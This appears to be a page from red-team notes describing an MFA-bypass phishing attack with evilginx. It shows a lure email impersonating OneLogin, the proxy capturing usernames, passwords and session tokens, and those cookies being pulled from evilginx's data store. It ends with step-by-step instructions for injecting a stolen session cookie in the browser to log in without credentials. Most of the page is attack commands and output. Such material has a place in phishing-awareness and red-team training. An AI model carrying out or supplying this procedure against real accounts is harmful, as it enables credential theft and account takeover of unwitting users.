MFA BYPASS

#example trigger
root@victim:~$ BROWSER > https://mail.google.com
 FROM: [email protected]
 SUBJECT: OneLogin - [Instructions] Activate your 30 Day OneLogin Trial

 redirect: {evilginx phish URL}

 * note: if users have some email security awareness training, they will be able to identify
   the malicious URLs whenever they hover their mouse on the links
    - if users aren't aware and clicked the links, they will be sent to the
      specified URLs being served by the evilginx server
      
    - evilginx will eventually capture anything the victim enters in the HTML fields to include username/password/tokens
       - once everything is captured, evilginx will redirect the user to any specified URLs or site
          - if is best to redirect users to the legitimate site!
          
#MFA Bypass using captured tokens re-use
root@oco:~$ sudo ./evilginx ...
evilginx:
 captured data...
  [05:46:00] [+++] [0] Username: [{[email protected]},remember_username]
  [05:46:10] [+++] [0] Password: [{arbitraryValue}]
  [05:46:03] [+++] [0] Detected authorization URL - tokens intercepted: /client/apps
   - captured tokens can be re-used to login to the legitimate site w/o supplying username or passwords

 * one the victim user enters their credentials, evilginx will capture the data
    - the captured credentials can then be used to for account takeover

root@oco:~$ sudo -i
root@oco:~$ ls -la
 .evilginx
root@oco:~$ cd .evilginx/
root@oco:~$ ls
 blacklist.txt config.yaml crt data.db
root@oco:~$ cat data.db
 sub_session_onelogin.com...,Value: eyJ0eXA...
 * identified cookies will show up here
    - this cookie can be used to bypass login portals

#bypass method by going to the legitimate website
root@oco:~$ BROWSER > https://app.onelogin.com/login > F12 > Application > Storage > Cookies > Session Cookie
 Name: {sub_session_onelogin.com}
  - enter the cookie name captured in evilginx
 Value: {arbitraryValue}
  - enter/replace the current cookie value with the one captured in evilginx (if any)
 
 * ignore the login page as that is not necessary for cookie logins

root@oco:~$ BROWSER > https://app.onelogin.com
 * remove the entire parameter leaving only the subdomain.domain.tld URL
    - the cookie will take care of everything and will automatically log in via the cookie value
PreviousCREDENTIAL HARVESTINGNextGOPHISH

Last updated